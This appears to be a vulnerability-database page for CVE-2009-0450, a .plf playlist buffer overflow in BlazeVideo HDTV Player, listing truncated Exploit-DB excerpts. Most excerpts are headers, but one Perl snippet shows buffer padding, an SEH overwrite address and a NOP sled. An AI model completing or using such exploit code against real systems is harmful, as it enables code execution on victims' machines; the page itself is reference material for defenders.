CVE-2009-0450
Published: 2009-02-10
Priority: P347; severity: critical; CVSS 2.0: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
EXPLOIT
EPSS: 10.14% (95.1th percentile)
Stack-based buffer overflow in BlazeVideo HDTV Player 3.5 and earlier allows remote attackers to execute arbitrary code via a long string in a playlist (aka .plf) file.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| blazevideo | hdtv_player | <= 3.5 | — |
| blazevideo | hdtv_player | — | — |
No detection rules found.
Exploit-DB
BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass
exploitdb·2011-10-07
---
# Exploit Title: BlazeVideo HDTV Player 6.6 Professional (Universal DEP+ASLR Bypass)
# Author: modpr0be
# Software Download: http://www.blazevideo.com/download.php?product=blazevideo-hdtv-pro
# Date: 07/10/2011
# Tested on: Windows XP SP3, Windows Vista SP2, Windows 7 SP1
# Thanks: corelanc0d3r, cyb3r.anbu, otoy, sickness, 5m7x, loneferret, _sinn3r, mr_me
# Take a look at mona.py :) awesome tool developed by corelanc0d3r and his team:
# https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/
# this is the old fashioned bug, i just try to make it universal :)
# it has also been exploited by:
# Greg Linares: http://www.exploit-db.com/exploits/2880
# LiquidWorm: http://www.exploit-db.com/exploits/7975
# hack
Exploit-DB
BlazeDVD 5.1/HDTV Player 6.0 - '.plf' Universal Buffer Overflow (SEH)
exploitdb·2009-08-04
---
#!/usr/bin/perl
# by ThE g0bL!N
#THNX: His0k4 Wahdo :)
#BlazeDVD 5.1 Professional/Blaze HDTV Player 6.0 /(.PLF File) Universal Buffer Overflow Exploit (SEH)
##################################################################
my $bof="\x41" x 608;
my $nsh="\xEB\x06\x90\x90";
my $seh="\x71\xFB\x32\x60"; # Universal Address
my $nop="\x90" x 20;
Exploit-DB
BlazeVideo HDTV Player 3.5 - '.PLF' Playlist File Local Overflow
exploitdb·2009-02-04
---
#!/usr/bin/python
#
# Title: BlazeVideo HDTV Player <= 3.5 PLF Playlist File Remote Heap Overflow Exploit
#
# Summary: BlazeVideo HDTV Player (BlazeDTV) is a full-featured and easy-to-use HDTV
# Player software, combining HDTV playback, FM receiving, video record and DVD playback
# functions. You can make advantage of PC monitor's high resolution, watch, record, playback
# high definition HDTV program or teletext broadcast program.
#
# Product web page: http://www.blazevideo.com/hdtv-player/index.htm
#
# Tested on Microsoft Windows XP Professional SP2 (English)
#
# ------------------------------------windbg------------------------------------
#
# (620.d74): Access violation - code c0000005 (first chance)
# First chance
Exploit-DB
BlazeVideo HDTV Player 2.1 - '.PLF' Local Buffer Overflow
exploitdb·2006-12-01
---
/*
0-day BlazeVideo HDTV Player
30 days of Media Player Exploits by Greg Linares
Discovered and Reported By: Greg Linares
Reported Exploit Date: 12/1/2006
*/
#include
#include
#include
int main(int argc, char *argv[])
{
FILE *Exploit;
/* Executes Calc.exe Alpha2 Shellcode Provided by Expanders */
/* replace it with your own shellco
No writeups or analysis indexed.
Published: 2009-02-10